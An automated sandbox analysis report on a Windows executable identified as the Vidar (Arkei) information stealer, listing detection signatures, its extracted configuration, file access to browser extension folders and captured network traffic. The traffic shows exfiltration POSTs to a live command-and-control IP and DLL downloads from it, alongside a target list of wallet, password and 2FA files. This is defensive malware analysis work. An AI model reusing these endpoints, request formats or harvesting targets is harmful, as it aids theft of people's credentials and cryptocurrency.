Windows Analysis Report T6zZFfRLqs.exe

Overview

General Information

Sample Name: T6zZFfRLqs.exe
Analysis ID: 491601
MD5: 5d5e83e151a99bed97e13839e8881cb5
SHA1: 4f008fe578e0f32ed5dda8d30883a900630f1be4
SHA256: 1a0f891e8d7d659d550b35c54f542180cd2629d3a62e35e695e43fd1f5dad0b3
Tags: ArkeiStealerexe
Infos:

Most interesting Screenshot:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected unpacking (overwrites its own PE header)
Yara detected Vidar
Yara detected Vidar stealer
Detected unpacking (changes PE section rights)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Self deletion via cmd delete
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses taskkill to terminate processes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: HTTP data Malware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}
Machine Learning detection for sample
Source: T6zZFfRLqs.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack Avira: Label: TR/Patched.Ren.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00416200 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, 1_2_00416200
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00416190 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00416190
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00416340 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove, 1_2_00416340

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack
Uses 32bit PE files
Source: T6zZFfRLqs.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source: Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose, 1_2_0041B590
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW, 1_2_00496670
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose, 1_2_0041B810
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose, 1_2_0040EB20
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset, 1_2_00405D80
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok, 1_2_0040F150
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 86263Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 88.99.75.82 88.99.75.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:09 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:09 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
